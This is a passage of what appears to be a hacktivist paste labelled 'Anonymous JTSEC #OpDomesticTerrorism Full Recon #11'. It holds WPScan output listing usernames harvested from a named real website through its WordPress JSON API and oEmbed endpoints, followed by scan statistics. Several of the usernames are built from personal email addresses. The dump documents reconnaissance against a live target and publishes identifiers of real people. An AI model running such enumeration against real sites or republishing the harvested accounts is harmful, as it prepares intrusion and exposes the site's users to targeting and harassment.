- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] johnnymaga1988gmail-com
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] awhiterrabettgmail-com
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] sixgunstrattongmail-com
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] megfischerlive-com
- | Detected By: Wp Json Api (Aggressive Detection)
- | - http://theredelephants.com/wp-json/wp/v2/users/
- [+] windycityfan
- | Detected By: Oembed API - Author URL (Aggressive Detection)
- | - http://theredelephants.com/wp-json/oembed/1.0/embed?url=http://theredelephants.com/&format=json
- [+] Finished: Wed Nov 7 23:35:59 2018
- [+] Requests Done: 3034
- [+] Cached Requests: 58
- [+] Data Sent: 811.64 KB
- [+] Data Received: 195.966 MB
- [+] Memory used: 215.688 MB
- [+] Elapsed time: 00:16:28
- =======================================================================================================================================
- #######################################################################################################################################
- Anonymous JTSEC #OpDomesticTerrorism Full Recon #11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement